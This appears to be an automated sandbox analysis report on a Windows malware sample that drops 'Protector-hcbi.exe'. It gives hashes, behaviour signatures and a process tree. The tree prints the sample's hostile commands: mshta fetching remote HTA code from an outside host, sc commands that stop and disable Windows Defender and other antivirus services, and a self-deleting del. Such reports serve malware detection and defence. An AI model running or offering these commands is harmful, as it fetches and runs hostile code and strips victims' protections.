Analysis

  • max time kernel
    150s
  • max time network
    167s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    25-11-2022 07:26

General

  • Target

    9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe

  • Size

    2.7MB

  • MD5

    25543861ba274d232c398bc842057def

  • SHA1

    72fead8c6e44aade2f1f7df53a59d2258bdbc3d7

  • SHA256

    9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad

  • SHA512

    03ae0f679a3258eb07b8e888b34eac04522fbc8cd11f5ffbee140748ac0d1e041d6b5f605c7a5a876c4e0412620285c37189ad45636cf9dbf5a899c92c948ad2

  • SSDEEP

    49152:1b2JAKeNCqs5pTNkRLq7J7EzlbCFKmoeBbUkoqypczICPk:1bIAKeNCrtkFMJ7glbqIeBbUZHC

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://galaint.releaseinfoupdate.pl/?0=126&1=2&2=1&3=118&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=1111&12=ybpkowbwqh&14=1

Signatures

  • UAC bypass 3 TTPs 3 IoCs
  • Disables taskbar notifications via registry modification
  • Executes dropped EXE 1 IoCs
  • Sets file execution options in registry 2 TTPs 64 IoCs
  • Stops running service(s) 3 TTPs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs
  • System policy modification 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe
    "C:\Users\Admin\AppData\Local\Temp\9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1748
    • C:\Users\Admin\AppData\Roaming\Protector-hcbi.exe
      C:\Users\Admin\AppData\Roaming\Protector-hcbi.exe
      2⤵
      • UAC bypass
      • Executes dropped EXE
      • Sets file execution options in registry
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Drops file in System32 directory
      • Modifies Internet Explorer settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • System policy modification
      PID:1328
      • C:\Windows\SysWOW64\mshta.exe
        mshta.exe "http://galaint.releaseinfoupdate.pl/?0=126&1=2&2=1&3=118&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=1111&12=ybpkowbwqh&14=1"
        3⤵
        • Modifies Internet Explorer settings
        PID:1772
      • C:\Windows\SysWOW64\sc.exe
        sc stop WinDefend
        3⤵
        • Launches sc.exe
        PID:1120
      • C:\Windows\SysWOW64\sc.exe
        sc config WinDefend start= disabled
        3⤵
        • Launches sc.exe
        PID:1032
      • C:\Windows\SysWOW64\sc.exe
        sc stop msmpsvc
        3⤵
        • Launches sc.exe
        PID:1984
      • C:\Windows\SysWOW64\sc.exe
        sc config msmpsvc start= disabled
        3⤵
        • Launches sc.exe
        PID:1508
      • C:\Windows\SysWOW64\sc.exe
        sc stop AntiVirService
        3⤵
        • Launches sc.exe
        PID:1072
      • C:\Windows\SysWOW64\sc.exe
        sc config ekrn start= disabled
        3⤵
        • Launches sc.exe
        PID:1968
      • C:\Windows\SysWOW64\sc.exe
        sc stop GuardX
        3⤵
        • Launches sc.exe
        PID:272
      • C:\Windows\SysWOW64\sc.exe
        sc config AntiVirSchedulerService start= disabled
        3⤵
        • Launches sc.exe
        PID:1312
      • C:\Windows\SysWOW64\sc.exe
        sc config AntiVirService start= disabled
        3⤵
        • Launches sc.exe
        PID:1928
      • C:\Windows\SysWOW64\sc.exe
        sc config GuardX start= disabled
        3⤵
        • Launches sc.exe
        PID:1700
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\954301~1.EXE" >> NUL
      2⤵
        PID:1720

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Protector-hcbi.exe
      Filesize

      2.7MB

      MD5

      25543861ba274d232c398bc842057def

      SHA1

      72fead8c6e44aade2f1f7df53a59d2258bdbc3d7

      SHA256

      9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad

      SHA512

      03ae0f679a3258eb07b8e888b34eac04522fbc8cd11f5ffbee140748ac0d1e041d6b5f605c7a5a876c4e0412620285c37189ad45636cf9dbf5a899c92c948ad2

    • C:\Users\Admin\AppData\Roaming\Protector-hcbi.exe
      Filesize

      2.7MB

      MD5

      25543861ba274d232c398bc842057def

      SHA1

      72fead8c6e44aade2f1f7df53a59d2258bdbc3d7

      SHA256

      9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad

      SHA512

      03ae0f679a3258eb07b8e888b34eac04522fbc8cd11f5ffbee140748ac0d1e041d6b5f605c7a5a876c4e0412620285c37189ad45636cf9dbf5a899c92c948ad2

    • \Users\Admin\AppData\Roaming\Protector-hcbi.exe
      Filesize

      2.7MB

      MD5

      25543861ba274d232c398bc842057def

      SHA1

      72fead8c6e44aade2f1f7df53a59d2258bdbc3d7

      SHA256

      9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad

      SHA512

      03ae0f679a3258eb07b8e888b34eac04522fbc8cd11f5ffbee140748ac0d1e041d6b5f605c7a5a876c4e0412620285c37189ad45636cf9dbf5a899c92c948ad2

    • \Users\Admin\AppData\Roaming\Protector-hcbi.exe
      Filesize

      2.7MB

      MD5

      25543861ba274d232c398bc842057def

      SHA1

      72fead8c6e44aade2f1f7df53a59d2258bdbc3d7

      SHA256

      9543019093bc022b4e5151e4d829357d706a20f3797fddee1a683ddbb3063aad

      SHA512

      03ae0f679a3258eb07b8e888b34eac04522fbc8cd11f5ffbee140748ac0d1e041d6b5f605c7a5a876c4e0412620285c37189ad45636cf9dbf5a899c92c948ad2

    • memory/272-85-0x0000000000000000-mapping.dmp
    • memory/1032-78-0x0000000000000000-mapping.dmp
    • memory/1072-82-0x0000000000000000-mapping.dmp
    • memory/1120-77-0x0000000000000000-mapping.dmp
    • memory/1312-84-0x0000000000000000-mapping.dmp
    • memory/1328-93-0x00000000052D0000-0x00000000052E0000-memory.dmp
      Filesize

      64KB

    • memory/1328-98-0x0000000005930000-0x0000000005942000-memory.dmp
      Filesize

      72KB

    • memory/1328-95-0x00000000057B0000-0x00000000057C6000-memory.dmp
      Filesize

      88KB

    • memory/1328-94-0x00000000052E0000-0x00000000052ED000-memory.dmp
      Filesize

      52KB

    • memory/1328-70-0x00000000001B0000-0x00000000001B6000-memory.dmp
      Filesize

      24KB

    • memory/1328-73-0x0000000000400000-0x000000000073B000-memory.dmp
      Filesize

      3.2MB

    • memory/1328-97-0x00000000053E0000-0x00000000053EE000-memory.dmp
      Filesize

      56KB

    • memory/1328-96-0x00000000057E0000-0x000000000581B000-memory.dmp
      Filesize

      236KB

    • memory/1328-76-0x0000000000400000-0x000000000073B000-memory.dmp
      Filesize

      3.2MB

    • memory/1328-99-0x0000000005C01000-0x0000000006AAD000-memory.dmp
      Filesize

      14.7MB

    • memory/1328-88-0x0000000004FC0000-0x000000000501F000-memory.dmp
      Filesize

      380KB

    • memory/1328-87-0x0000000004500000-0x0000000004FBA000-memory.dmp
      Filesize

      10.7MB

    • memory/1328-63-0x0000000000000000-mapping.dmp
    • memory/1328-92-0x0000000005380000-0x00000000053DA000-memory.dmp
      Filesize

      360KB

    • memory/1328-89-0x0000000005240000-0x000000000528F000-memory.dmp
      Filesize

      316KB

    • memory/1508-80-0x0000000000000000-mapping.dmp
    • memory/1700-86-0x0000000000000000-mapping.dmp
    • memory/1720-66-0x0000000000000000-mapping.dmp
    • memory/1748-58-0x0000000000400000-0x000000000073B000-memory.dmp
      Filesize

      3.2MB

    • memory/1748-55-0x0000000000400000-0x000000000073B000-memory.dmp
      Filesize

      3.2MB

    • memory/1748-56-0x0000000000400000-0x000000000073B000-memory.dmp
      Filesize

      3.2MB

    • memory/1748-57-0x0000000000400000-0x000000000073B000-memory.dmp
      Filesize

      3.2MB

    • memory/1748-54-0x0000000076091000-0x0000000076093000-memory.dmp
      Filesize

      8KB

    • memory/1748-60-0x0000000000400000-0x000000000073B000-memory.dmp
      Filesize

      3.2MB

    • memory/1748-68-0x0000000000400000-0x000000000073B000-memory.dmp
      Filesize

      3.2MB

    • memory/1748-59-0x0000000000230000-0x0000000000236000-memory.dmp
      Filesize

      24KB

    • memory/1772-75-0x0000000000000000-mapping.dmp
    • memory/1928-83-0x0000000000000000-mapping.dmp
    • memory/1968-81-0x0000000000000000-mapping.dmp
    • memory/1984-79-0x0000000000000000-mapping.dmp